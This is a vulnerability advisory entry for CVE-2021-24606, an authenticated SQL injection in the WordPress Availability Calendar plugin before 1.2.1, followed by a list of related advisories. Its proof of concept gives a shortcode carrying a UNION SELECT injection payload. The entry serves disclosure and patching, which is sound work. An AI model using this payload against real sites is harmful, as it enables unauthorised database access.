Availability Calendar < 1.2.1 – Authenticated SQL Injection | CVE 2021-24606 | Plugin Vulnerabilities

Description

The plugin does not escape the category attribute from its shortcode before using it in a SQL statement, leading to a SQL Injection issue, which can be exploited by any user able to add shortcode to posts/pages, such as contributor+

Proof of Concept

With an account role as low as contributor, put the following in a page/post: [availabilitycalendar category="1) UNION select user(),user(),user(),user(),user(),user(),user() -- "]

Affects Plugins

availability-calendar

Fixed in 1.2.1

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

xiahao@webray.com.cn inc

Submitter

xiahao@webray.com.cn inc

Submitter twitter

lAmn9V6MU9Dfb8p

Verified

Yes

WPVDB ID

fe49f48a-f97a-44fe-8d71-be08e7ce4f83

Timeline

Publicly Published

2021-08-04 (about 4 years ago)

Added

2021-08-19 (about 4 years ago)

Last Updated

2022-04-09 (about 3 years ago)

Other

Published

Title

Published

2017-06-27

Title

Ultimate Product Catalogue <= 4.2.2 - Authenticated SQL Injection

Published

2015-07-10

Title

CP Multi View Event Calendar <= 1.1.7 - Unauthenticated SQL Injection

Published

2025-04-04

Title

Video & Photo Gallery for Ultimate Member <= 1.1.3 - Authenticated (Administrator+) SQL Injection

Published

2018-02-25

Title

WP Support Plus Responsive Ticket System < 9.0.3 - Multiple Authenticated SQL Injection

Published

2014-08-01

Title

WP Realty - MySQL Time Based Injection